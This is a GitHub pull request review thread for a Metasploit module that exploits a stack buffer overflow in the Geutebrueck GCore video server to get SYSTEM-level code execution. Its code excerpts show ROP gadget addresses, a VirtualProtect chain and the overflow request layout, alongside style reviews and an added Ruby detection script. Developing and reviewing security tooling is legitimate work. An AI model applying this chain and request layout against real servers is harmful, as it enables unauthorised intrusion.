Added Geutebrueck GCore Remote Code Execution for 1.3.8.42 and 1.4.2.37 #8747
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' |
You don't need to require msf/core
## | ||
|
||
require 'msf/core' | ||
require 'nokogiri' |
You don't need to require nokogiri
], | ||
'References' => | ||
[ | ||
['www.geutebrueck.com', ''] |
Invalid format. Please use:
['EDB', '41153'],
['URL', 'https://packetstormsecurity.com/files/140762/geutebrueck-overflow.rb.txt']
And add any other references to the advisory, PoC or exploit if available.
{ | ||
'Space' => '2000' | ||
}, | ||
'Privileged' => false, |
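Review bot: 'Space' => '2000' in the Payload hash gives the available space as a string; other modules give it as an integer ('Space' => 2000), and the value is compared against the encoded payload length, so a string here will not behave like the integer the framework expects. Drop the quotes here and in the later copy of this hunk.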
If the exploit results in SYSTEM
then use 'Privileged' => true
'Space' => '2000' | ||
}, | ||
'Privileged' => false, | ||
'DisclosureDate' => '2017-01-24', |
Invalid date format.
Please run ./tools/dev/msftidy.rb modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
over the module.
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") | ||
ensure | ||
print_status('Closing socket.') | ||
disconnect |
If you use Msf::Exploit::Remote::HttpClient
then you don't need to disconnect
here.
print_status("Selected version: #{self.target.name}") | ||
target_rop, target_overwrite, target_stack_align = ropchain(self.target) | ||
begin | ||
connect |
If you use Msf::Exploit::Remote::HttpClient
then you don't need to connect
here.
else | ||
target_rop, target_overwrite, target_stack_align = ropchain(target) | ||
begin | ||
connect |
If you use Msf::Exploit::Remote::HttpClient
then you don't need to connect
here.
|
||
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align | ||
print_status('Exploit ready for sending...') | ||
sock.put(exploit, 'Timeout' => 20) |
Use send_request_cgi
instead.
|
||
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align | ||
print_status('Exploit ready for sending...') | ||
sock.put(exploit, 'Timeout' => 20) |
Use send_request_cgi
instead.
Review changes with msftidy.
The changes were implemented, except the use of Msf::Exploit::Remote::HttpClient, due to the specially crafted request.
|
||
def fingerprint | ||
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') | ||
@doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) |
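Review bot: open('http://...') in fingerprint relies on open-uri having patched Kernel#open and builds the URL by hand from RHOST and RPORT, so it bypasses the proxy and SSL options the HttpClient mixin honours and carries Kernel#open's string semantics into a code path that does not need them. Fetching the statistics page with send_request_cgi('uri' => '/statistics/runningmoduleslist.xml') and parsing res.body returns the same XML without the extra dependency and keeps the request visible to the framework's logging.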
This module was used due to the improper handling of the HTTP request by the web server, which was written by the vendor.
@m4p0 any status on the documentation?
@h00die I'll take care of the documentation. I can't provide a vulnerable application.
Would you be able to supply a pcap of exploitation (feel free to sanitize)? If you can get docs, a pcap, and 2 space, I should be able to look at it in the next few days and hopefully get this landed!
@h00die I'm checking if I can give a link to an application or a pcap. But I will add this as soon as possible.
'Privileged' => true, | ||
'DisclosureDate' => 'Jan 24 2017', | ||
'DefaultTarget' => 0)) | ||
end |
You can set the default port to avoid needing to set it at exploitation time. See
metasploit-framework/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
Line 33 in 12198a0
Opt::RPORT(50000), |
end | ||
|
||
def fingerprint | ||
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') |
Change to:
print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
|
||
def fingerprint | ||
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') | ||
@doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) |
"http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"
return Exploit::CheckCode::Appears, mytarget | ||
end | ||
end | ||
print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') |
Change to:
print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
end | ||
end | ||
print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') | ||
print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") |
change " to '
rop += [0x0000000000000400].pack('Q<') | ||
|
||
# 0x140a88f81: | POP R8; RET | ||
# 0x...40 | Value for VP "Execute Permissions" |
Just wanted to say that I appreciate all the comments you've put in here explaining each thing. Very nice!
end | ||
|
||
def exploit | ||
if target['auto'] |
Unless I'm not looking closely enough, it looks like there is minimal difference between the auto and target-selected areas of code here. It looks like if it's auto, you check and then handle if it's not vuln. From that point on, there look to be no changes, so we can most likely shorten up the code by bombing out on unknown.
I think this could really be something like (pseudo code)
if target['auto']
checkcode, self.target = fingerprint
fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
end
target_rop, target_overwrite, target_stack_align = ropchain(self.target)
[throw exploit with rescue and ensure areas]
I think I was able to shorten the code. Thank you @h00die. I think we have to start up the whole testing environment to verify that the code is still running as expected.
If you're able to get a PCAP, send it to msfdev@metasploit.com and we'll review it, match it to the code, and land this thing.
@m4p0 just wanted to check in on this PR
@h00die as a heads-up, we're on it. We will deliver the rest, like the pcap and tests for the working code, during the next week.
@h00die as told yesterday, the code fixes were made and tested. The PCAP has been delivered by now.
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', | ||
'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', |
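Review bot: the Description says every version from 2003 to July 2016 is affected, but the Targets list only carries ROP chains for 1.3.8.42 and 1.4.2.37, and the module itself warns that sending the wrong version's chain knocks out the service. The text should separate the vulnerable version range from the two versions this module can actually target, so an operator does not read "all versions" as "automatic targeting works on all versions".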
Can you multiline this. See https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/altn_webadmin.rb#L14 as an example (or pretty much every module)
'References' => | ||
[ | ||
['EDB','41153'], | ||
['URL','www.geutebrueck.com'] |
Maybe add: ['CVE', '2017-11517']
'Targets' => | ||
[ | ||
['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], | ||
['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], |
You can remove the () parts, or just do (Win7+)
[ | ||
['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], | ||
['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], | ||
['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] |
You can remove the () parts, or just do (Win7+)
'DefaultTarget' => 0)) | ||
|
||
register_options( | ||
[ |
you can shorten this to [Opt::RPORT(13003)]
# 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
rop = '' | ||
rop += [0x140ccb984].pack('Q<') | ||
rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; |
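Review bot: the comment on the padding line misspells "aligning" and does not say where the count of 5 comes from; stating that 5 qwords × 8 bytes = 0x28 matches the add rsp, 0x28 in the gadget commented at 0x140ccb984 lets a reader verify the padding without re-deriving it.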
+= to <<
# We want RCX to hold the value for VP Argument "Address of Shellcode" | ||
# 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
rop = '' | ||
rop += [0x140ccb984].pack('Q<') |
+= to <<
# Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. | ||
# We want RCX to hold the value for VP Argument "Address of Shellcode" | ||
# 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
rop = '' |
This line is the same in both, it could be moved to before the if
statement.
overwrite = target_overwrite | ||
stack_align = target_stack_align | ||
|
||
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align |
Instead of these single use variables here, could we simplify:
exploit = 'GET /'
exploit << "\x41" * 200
exploit << target_rop
exploit << payload.encoded
exploit << "\x41" * 1823
exploit << target_overwrite
exploit << target_stack_align
I'm also assuming you couldn't use the send_request_cgi
? I didn't go back through all the comments, figured it was discussed there and just wanted to make sure it was.
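The request layout spelled out in the comment above ('GET /' followed by 200 filler bytes, the ROP chain, the payload and a further 1823 filler bytes) is also the shape a defender watching the 13003/13004 listener would want to recognise. The Ruby script below is an added example and is not part of this pull request or of the module: it parses the first line of a raw HTTP request and flags it when the request-target is oversized or contains non-printable bytes, which is exactly what distinguishes the overflow request from the normal fingerprint request to /statistics/runningmoduleslist.xml. The sample requests are constructed for the example (the overflow-shaped one contains only filler and one packed integer, no gadgets or payload), and the 512-byte threshold and the function names are assumptions.

```ruby
# Added example (not from the PR): classify raw HTTP request lines by
# request-target length and non-printable content, so that an
# overflow-shaped request such as 'GET /' + 200 filler bytes + packed
# addresses + more filler is flagged before it reaches the service.

# Assumption: legitimate GCore request-targets are far shorter than this.
MAX_TARGET_LEN = 512

# Parse the first line of a raw request into method, target and version.
# Returns nil when there is no recognisable request line.
def parse_request_line(raw)
  line = raw.b.split("\r\n", 2).first.to_s
  parts = line.split(' ', 3)
  return nil unless parts.size >= 2
  { method: parts[0], target: parts[1], version: parts[2] }
end

# Count bytes outside printable ASCII (0x20..0x7e). A URL-encoded
# request-target should contain none; packed 64-bit values always do.
def nonprintable_count(str)
  str.b.each_byte.count { |b| b < 0x20 || b > 0x7e }
end

# Classify one raw request. Returns a hash with :verdict (:benign,
# :suspicious or :malformed) and the list of reasons, so a caller can
# log or alert on it.
def classify_request(raw)
  req = parse_request_line(raw)
  return { verdict: :malformed, reasons: ['no request line'] } if req.nil?

  reasons = []
  len = req[:target].bytesize
  reasons << "request-target length #{len} exceeds #{MAX_TARGET_LEN}" if len > MAX_TARGET_LEN
  np = nonprintable_count(req[:target])
  reasons << "#{np} non-printable bytes in request-target" if np > 0
  if req[:version].nil? || req[:version].empty?
    reasons << 'no HTTP version (HTTP/0.9-style request line)'
  end

  { verdict: reasons.empty? ? :benign : :suspicious, reasons: reasons }
end

# Constructed samples: the module's fingerprint request, and a request
# with the overflow layout but only filler plus one packed integer.
BENIGN_REQUEST = "GET /statistics/runningmoduleslist.xml HTTP/1.1\r\n" \
                 "Host: 192.0.2.10:13003\r\n\r\n"
OVERFLOW_SHAPED_REQUEST = 'GET /' + ("\x41" * 200) +
                          [0x0000000000000400].pack('Q<') +
                          ("\x41" * 1823)

if $PROGRAM_NAME == __FILE__
  [BENIGN_REQUEST, OVERFLOW_SHAPED_REQUEST].each do |raw|
    result = classify_request(raw)
    puts "#{result[:verdict]}: #{result[:reasons].join('; ')}"
  end
end
```

Run as a script it prints one verdict per sample; the second sample is reported as suspicious on all three counts (length, eight non-printable bytes from the packed value, and no HTTP version). The length test alone would already catch the request described in the PR, since 200 + 1823 filler bytes dwarf any real GCore path; the non-printable check is what keeps a long but legitimate URL from tripping the rule.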
print_status('Exploit sent!') | ||
buf = sock.get_once || '' | ||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e | ||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") |
I would add a fail_with here as well.
I checked over the pcap, looks good. One last pass through the code; some things were bothering me stylistically. Once those changes are done, I'll land since the functionality is good.
All changes were adopted.
Looks good, I'm going to give it one last run through tonight to make sure nothing functionally changed (doesn't look to be) and then give this a merge.
Thanks for your support and patience. I'll def. open a beer when this module is part of Metasploit.
go get that beer.
Release Notes: This module adds an RCE against Geutebrueck GCore.
Thanks again for sticking with this, it took a while, so I (we) appreciate all the work!
\o/
I had a ninja edit, your spacing was off. 7ad151e
Geutebrueck_GCore_X64_RCE_BO
Metasploit module for the Geutebrueck GCore "video management" system. Tested with versions 1.3.8.42 and 1.4.2.37.
Full remote code execution with NT/System privileges on Windows (Win 2012R2, Win8.1, ...) with the installed Geutebrueck products (GCore).
Authors:
https://www.infoguard.ch
Luca Cappiello
Maurice Popp
POC: